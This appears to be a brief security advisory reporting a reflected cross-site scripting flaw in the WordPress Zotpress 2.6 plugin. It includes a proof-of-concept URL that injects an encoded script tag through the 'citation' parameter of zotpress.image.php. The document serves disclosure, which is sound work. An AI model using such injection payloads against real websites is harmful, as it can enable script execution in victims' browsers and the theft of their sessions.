WordPress Zotpress version 2.6 suffers from a cross site scripting vulnerability.
60782f41cea55e5e0a2c3ce9309ab66504f1a16250b8664f8735e2e80c0be95d
------------------------------------------------------------------------
Software................WordPress Zotpress 2.6
Vulnerability...........Reflected Cross-site Scripting
Download................http://katieseaborn.com/plugins/
Release Date............2/23/2011
Tested On...............Windows 7 + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
------------------------------------------------------------------------
--Description--
A reflected cross-site scripting vulnerability in WordPress Zotpress
2.6 can be exploited to execute arbitrary JavaScript.
--PoC--
http://localhost/wordpress/wp-content/plugins/zotpress/zotpress.image.php?citation=%3cscript%3ealert(0)%3c%2fscript%3e